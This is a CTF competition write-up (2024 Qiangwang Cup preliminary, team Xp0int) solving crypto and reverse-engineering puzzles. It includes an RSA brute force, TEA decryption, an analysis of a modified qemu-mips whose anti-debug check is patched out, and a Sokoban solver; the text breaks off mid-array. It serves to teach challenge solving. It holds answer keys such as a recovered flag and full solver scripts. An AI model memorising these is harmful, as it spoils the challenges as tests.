2024 强网杯 初赛 Writeup By Xp0int
1. Crypto
1.1 EazyRSA
p + q = 2ga + 1 + 2gb + 1 = 2g(a+b) + 2
phi = (N + 1) - (p + q)
h = 2ga*b + (a + b) = a + b mod g
a+b = h mod g +k*g
爆破 k
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from tqdm import tqdm
from gmpy2 import powmod,invert
from Crypto.Util.number import *
N=60740780211716134819836002274804637580790962241224122690066838726205677637215939786897761726586919038543248948203893427582371749933631392644158841494627373928843233293083235402487837169475418109067763113822446617399220116049061782406145221709991507430419797213297653656316297339202469776578286749009682606694849877437458210220031450785172296346590139341662440363978361405828630819809790755361031797869551120610771726908264810507474202776473041884740789795265723846415600932800378894014957784923865284655395312592426650245014283625541689754606403778110203465756580880379899885859943404697529556893301507300535097720879
e=65537
g=2636113641803369813671530555502399571374539820105959692674071752423565905337744132984628828917406469694636507461077266861313657411681891602993912665851
enc=4153439801780100333014443719709978674411432664418726740751619191891838980236716238723839036185391060250230668383978749447184631270830933717945007369440153900462015113038736905371760807555181958069358027285964662888126186916437279574058905564164885513185119926589138897493007875843095909665972727323110343001515077620470294473869543068325267099461570698711560672948289319338246346891744759211538992560039190638514465010555861912767674589777873166924481493249982056928754511501393287286040839876082810858008509206396992562822245917202200616883991500902013909367797847507704085069229111773925469078170681851461867570849
h = (N-1)//(2*g)
hg = h%(8*g)
for k in tqdm(range(2**22-1,2**23-1)):
ab = hg + k*8*g
pq = 2*g*ab+2
phi = (N+1)-pq
if gcd(e,phi) != 1:
continue
else:
d = invert(e, phi)
m = long_to_bytes(powmod(enc,d,N))
if m.startswith(b'flag') or m.startswith(b'FLAG') or m.startswith(b'qwb') or m.startswith(b'QWB'):
print(m,k)
break
# flag{f548cb22-e506-4b64-8682-1fe8d1efed5c}
1.2 21_steps
计算汉明重量, 想到 SWAR 算法
参考 https://blog.nowcoder.net/n/23c59a506ed44ed897ebcb0ee17f9adc
1
2
3
4
5
6
7
8
9
10
def swar128(n):
n -= (n >> 1) & 0x55555555555555555555555555555555
n = (n >> 2 & 0x33333333333333333333333333333333) + (n & 0x33333333333333333333333333333333)
n = (n >> 4) + n & 0x0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F
n = (n >> 8) + n & 0x00FF00FF00FF00FF00FF00FF00FF00FF
n = (n >> 16) + n & 0x0000FFFF0000FFFF0000FFFF0000FFFF
return n % 255
# B=A>>1;B=B&113427455640312821154458202477256070485;A=A-B;B=A&68056473384187692692674921486353642291;A=A>>2;A=A&68056473384187692692674921486353642291;A=A+B;B=A>>4;A=A+B;A=A&20016609818878733144904388672456953615;B=A>>8;A=A+B;A=A&1324055902416102970674609367438786815;B=A>>16;A=A+B;A=A&5192217631581220737344928932233215;A=A%255;
共计 19 步
2. Reverse
2.1 斯内克
打开后可以 shift+f12 查找到相关函数
逻辑如下
后进入主加密逻辑函数,以下部分为加密部分
经过测试可以得到 sub_7FF7EE4A141F((__int64)lpAddress, 1269, Buf2);此函数为不可逆函数,只要注重解决最短路问题即可
下发新赛题后直接玩游戏即可,得到 10 分后自动断了下来
得到 flag 判断部分
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
char __fastcall sub_17896B60000(int *a1)
{
char *v1; // rdi
__int64 i; // rcx
char v4; // [rsp+20h] [rbp+0h] BYREF
unsigned int v5; // [rsp+24h] [rbp+4h]
int v6; // [rsp+44h] [rbp+24h]
int v7[12]; // [rsp+68h] [rbp+48h] BYREF
unsigned int v8; // [rsp+98h] [rbp+78h]
unsigned int v9; // [rsp+9Ch] [rbp+7Ch]
unsigned int v10; // [rsp+A0h] [rbp+80h]
unsigned int v11; // [rsp+A4h] [rbp+84h]
unsigned int j; // [rsp+C4h] [rbp+A4h]
unsigned int k; // [rsp+E4h] [rbp+C4h]
char v14[44]; // [rsp+108h] [rbp+E8h]
int m; // [rsp+134h] [rbp+114h]
v1 = &v4;
for ( i = 78i64; i; --i )
{
*(_DWORD *)v1 = -858993460;
v1 += 4;
}
v5 = 0;
v6 = -1640531527;
qmemcpy(v7, "W31c0m3. 2 QWBs8", 16);
v8 = *a1;
v9 = a1[1];
v10 = a1[2];
v11 = a1[3];
for ( j = 0; j < 0x20; ++j )
{
v8 += (v7[v5 & 3] + v5) ^ (v9 + ((v9 >> 5) ^ (16 * v9)));
v5 += v6;
v9 += (v7[(v5 >> 11) & 3] + v5) ^ (v8 + ((v8 >> 5) ^ (16 * v8)));
}
for ( k = 0; k < 0x20; ++k )
{
v10 += (v7[v5 & 3] + v5) ^ (v11 + ((v11 >> 5) ^ (16 * v11)));
v5 += v6;
v11 += (v7[(v5 >> 11) & 3] + v5) ^ (v10 + ((v10 >> 5) ^ (16 * v10)));
}
v8 ^= v10;
v9 ^= v11;
v11 ^= v8;
v10 ^= v9;
v14[0] = -104;
v14[1] = -96;
v14[2] = -39;
v14[3] = -104;
v14[4] = -70;
v14[5] = -105;
v14[6] = 27;
v14[7] = 113;
v14[8] = -101;
v14[9] = -127;
v14[10] = 68;
v14[11] = 47;
v14[12] = 85;
v14[13] = -72;
v14[14] = 55;
v14[15] = -33;
for ( m = 0; m < 16; ++m )
{
if ( *((char *)&v8 + m) != v14[m] )
return 0;
}
return 1;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include<stdio.h>
int main()
{
unsigned int enc[4] = { 3330717369,922062711,1583289889,1206786253 };
unsigned int key[4] = { 0x63313357,0x2e336d30,0x51203220,0x38734257 };
int i, j;
long sum = 0, delta = 0x9E3779B9;
// 解码
for (i = 0; i < 4; i += 2) {
sum = (64 * delta);
for (j = 0; j < 32; j++) {
enc[i + 1] -= (((enc[i] >> 5) ^ (16 * enc[i])) + enc[i]) ^ (key[((sum >> 11) & 3)] + sum);
sum -= delta;
enc[i] -= ((((enc[i + 1] >> 5) ^ (16 * enc[i + 1])) + enc[i + 1]) ^ key[sum & 3] + sum);
}
}
// 打印
for (i = 0; i < 4; i++)
{
for (j = 0; j <= 3; j++)
{
printf("%c", (enc[i] >> (j * 8)) & 0xFF);
}
}
return 0;
}
2.2 mips
魔改了 qemu-mips,禁用了调试以及隐藏了加密逻辑
–version 可以看到版本号,编译一份相同的 qemu-mips 然后进行比对
魔改的 qemu 没有修改 mipsbin,而是自定义了 syscall 4004 来处理控制台的 print,并在里面另有一段加密校验,要满足三个 check 才能 getflag
- check1 校验 flag 头并复制
- check2 进行一系列的真正加密逻辑,并异或了一个会根据调试状态变化的 key,去花可以看到完整逻辑。check2 发生在 mips_tr_init_disas_context,在最后也会运行到
- check3 是开了 gdb 调试就会不通过,直接改掉即可
最后就是解密真正的逻辑,不知道为什么 z3 不能跑,直接爆了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
range_0_255 = [0x36, 0x68, 0x32, 0x44, 0x12, 0x61, 0x6F, 0xDF, 0xBA, 0xE9, 0x98, 0x28, 0x3D, 0xA8, 0xE6, 0x1E, 0x4D, 0xF2, 0xB1, 0x7E, 0xC2, 0x6A, 0x96, 0x8C, 0x37, 0x19, 0x14, 0x42, 0xA2, 0x11, 0xE5, 0x5B, 0x9D, 0x23, 0x03, 0x83, 0xF8, 0xD8, 0x09, 0x8A, 0x3C, 0x7D, 0x1A, 0x46, 0x49, 0xDC, 0x76, 0x63, 0x3E, 0x04, 0x9A, 0x0C, 0x43, 0x4B, 0x72, 0x5F, 0x53, 0x21, 0x74, 0x66, 0x4F, 0xA7, 0xF6, 0x7B, 0x94, 0xA3, 0x47, 0x8F, 0xF4, 0x52, 0x2A, 0x89, 0x30, 0x33, 0x27, 0x2C, 0xF5, 0x75, 0x17, 0x79, 0x5E, 0x7F, 0x9C, 0xCB, 0x55, 0xBB, 0x60, 0x38, 0xB8, 0xD2, 0xD4, 0x8B, 0xBF, 0x1F, 0x41, 0x45, 0x00, 0x82, 0x69, 0x40, 0xE1, 0x9F, 0xE2, 0xD3, 0x4A, 0x1C, 0x71, 0x62, 0x18, 0x24, 0x97, 0x84, 0x0A, 0x8E, 0x3F, 0x0F, 0x01, 0x86, 0x0E, 0x67, 0xC9, 0x99, 0x88, 0xB0, 0x6E, 0x54, 0x92, 0xEF, 0x9B, 0xD5, 0xA5, 0x0B, 0xDD, 0xBD, 0xAE, 0xCC, 0xC8, 0x3A, 0x65, 0x56, 0xE0, 0xF1, 0x06, 0x1B, 0xFA, 0xBC, 0xC4, 0x91, 0xC1, 0x2E, 0x13, 0xF0, 0x58, 0xEE, 0xAC, 0xEC, 0xA6, 0x26, 0x39, 0xB5, 0xAF, 0xC3, 0x10, 0x5A, 0x0D, 0x5D, 0x29, 0x15, 0x6B, 0x50, 0xB2, 0xFE, 0xAA, 0x90, 0xA9, 0x51, 0xD0, 0xB6, 0xC6, 0x34, 0xFC, 0xA0, 0xB3, 0x35, 0xEA, 0x07, 0xA4, 0x22, 0x80, 0x6D, 0x81, 0x57, 0x87, 0x25, 0xC7, 0x4C, 0xD6, 0xCE, 0x77, 0xD7, 0xAD, 0x78, 0x7A, 0x85, 0xA1, 0xF3, 0xE8, 0x5C, 0x73, 0x48, 0xDA, 0x31, 0x4E, 0x2D, 0x93, 0x16, 0x02, 0x70, 0x1D, 0xFB, 0xCD, 0xE3, 0xF7, 0x64, 0xF9, 0xC5, 0x08, 0x9E, 0x95, 0x2B, 0xE4, 0x20, 0xD1, 0xFD, 0x7C, 0x2F, 0xBE, 0xB9, 0xDB, 0xDE, 0xE7, 0xD9, 0x3B, 0xEB, 0xFF, 0xB7, 0xCA, 0xB4, 0x05, 0xC0, 0xAB, 0xCF, 0xED, 0x6C, 0x8D, 0x59]
key = [0xDE, 0xAD, 0xBE, 0xEF]
cmp_list = [
0x000000C4, 0x000000EE, 0x0000003C, 0x000000BB, 0x000000E7, 0x000000FD, 0x00000067, 0x0000001D, 0x000000F8, 0x00000097,
0x00000068, 0x0000009D, 0x0000000B, 0x0000007F, 0x000000C7, 0x00000080, 0x000000DF, 0x000000F9, 0x0000004B, 0x000000A0,
0x00000046, 0x00000091
]
part1 = [0xA4, 0xDC, 0x70, 0x99, 0x89, 0xC1, 0xCD, 0xC5, 0x70, 0xB3, 0x68, 0xBB, 0xE3, 0x4F, 0x75, 0x56, 0xB5, 0x15, 0xEF, 0x16, 0x4C, 0x9B]
_# cmp_list = [0xD7, 0xAF, 0x03, 0xEA, 0xFA, 0xB2, 0xBE, 0xC8, 0x03, 0xC0, 0x1B, 0xB6, 0xC6, 0x3C, 0x06, 0x25, 0x90, 0x66, 0x9C, 0x65, 0x3F, 0xE8, 0x4A, 0xF7, 0x1F, 0xC6, 0x4A, 0xF7, 0x6D, 0x9B, 0x4A][:22]_
_from_ z3 _import_ *
s = Solver()
_# input = [BitVec(f'v{_}', 8) for _ in range(22)]_
_# flag{dynamic_reverse123456}_
_# input = [ord(x) for x in "dynamic_reverse123456}"]_
_# _
_# print(input)_
output = cmp_list
output[7], output[11] = output[11], output[7]
output[12], output[16] = output[16], output[12]
_for_ i _in_ range(22):
output[i] ^= 0xa
v7 = 0
v8 = 0
_for_ j _in_ range(22):
v7 += 1
v12 = range_0_255[v7]
v8 += v12
v8 &= 0xff
range_0_255[v7],range_0_255[v8] = range_0_255[v8],range_0_255[v7]
tmpp = output[j] ^ key[j % 4] ^ range_0_255[(range_0_255[v7] + v12)&0xff]
tmp2 = (tmpp >> 3) | (tmpp << 5)
tmp2 &= 0xff
tmp2 ^= 0xDE
tmp1 = (tmp2 >> 4) | (tmp2 << 4)
tmp1 &= 0xff
tmp1 ^= 0xAD
v3 = (tmp1 >> 5) | (tmp1 << 3)
v3 &= 0xff
v3 ^= 0xBE
_# ro_tmp0 = (input[j] << 7) | (input[j] >> 1)_
_# ro_tmp0 &= 0xff_
_# v3_zheng = ((ro_tmp0) << 6) ^ 0xC0 | ((ro_tmp0) >> 2) ^ 0x3B_
_# v3_zheng &= 0xff_
_# # z3怎么解不出来啊啊啊啊_
_# s.add(v3 == v3_zheng)_
_# print(v3_zheng==v3)_
_for_ k _in_ range(0x20,0x7f+1,1):
ro_tmp0 = (k << 7) | (k >> 1)
ro_tmp0 &= 0xff
v3_zheng = ((ro_tmp0) << 6) ^ 0xC0 | ((ro_tmp0) >> 2) ^ 0x3B
v3_zheng &= 0xff
_if_ v3_zheng == v3:
print(chr(k), _end_='')
_break_
_#####################################################_
_# ro_tmp0 = (input[j] << 7) | (input[j] >> 1)_
_# ro_tmp0 &= 0xff_
_# v3 = ((((ro_tmp0) << 6) ^ 0xC0 | ((ro_tmp0) >> 2) ^ 0x3B) ^ 0xBE) & 0xff_
_# tmp1 = (32 * v3) | (v3 >> 3)_
_# tmp1 &= 0xff_
_# tmp2 = (16 * ((tmp1) ^ 0xAD)) | (((tmp1) ^ 0xAD) >> 4)_
_# tmp2 &= 0xff_
_# tmpp = ((((tmp2) ^ 0xDE) >> 5) | (8 * ((tmp2) ^ 0xDE)))_
_# tmpp &= 0xff_
_# op = tmpp ^ key[j % 4] ^ range_0_255[(range_0_255[v7] + v12)&0xff]_
_# # print(f"{hex(tmpp)} ^ {hex(key[j % 4])} ^ {range_0_255[(range_0_255[v7] + v12)&0xff]}")_
_# op &= 0xff _
_# output.append(op)_
_# if s.check() == sat:_
_# print(s.check())_
_# m = s.model()_
_# real_flag = []_
_# [real_flag.append(m[i].as_long()) for i in input]_
_# print(real_flag)_
_# else:_
_# print('unsat')_
2.3 boxx
推箱子游戏,去力扣找个算法来解,多箱子的图就肉眼盯减去几个箱子先,最后 4 个字符是最后地图的形状
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
import collections
from typing import List
class Solution:
def minPushBox(self, grid: List[List[str]]) -> int:
row, col = len(grid), len(grid[0])
classify = collections.defaultdict(list)
for i in range(row):
for j in range(col):
classify[grid[i][j]].append(complex(i, j))
player, box, target = *classify['S'], *classify['B'], *classify['T']
legalFloor = {player, box, target, *classify['.']}
directions = (1, -1, 1j, -1j)
def playerBfs(begin, end, legalFloorForPlayer):
playerBfsSet = {begin}
while playerBfsSet:
tempSet = set()
for currPlayer in playerBfsSet:
for direction in directions:
nextPlayer = currPlayer + direction
if nextPlayer in legalFloorForPlayer:
if nextPlayer == end:
return True
tempSet.add(nextPlayer)
legalFloorForPlayer.remove(nextPlayer)
playerBfsSet = tempSet
return False
steps = 1
playerBoxStateBfsSet = {(player, box)}
stateVisited = set()
while playerBoxStateBfsSet:
tempSet = set()
for currPlayer, currBox in playerBoxStateBfsSet:
for direction in directions:
nextBox = currBox + direction
nextPlayer = currBox - direction
if nextBox in legalFloor \
and (nextPlayer, currBox) not in stateVisited \
and playerBfs(currPlayer, nextPlayer, legalFloor - {currBox}):
if nextBox == target:
return steps
tempSet.add((currBox, nextBox))
stateVisited.add((nextPlayer, currBox))
playerBoxStateBfsSet = tempSet
steps += 1
return -1
import numpy as np
import hashlib
np.set_printoptions(linewidth=130)
grid = [0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000004, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000003, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000002, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000002, 0x00000000, 0x00000000, 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000000, 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 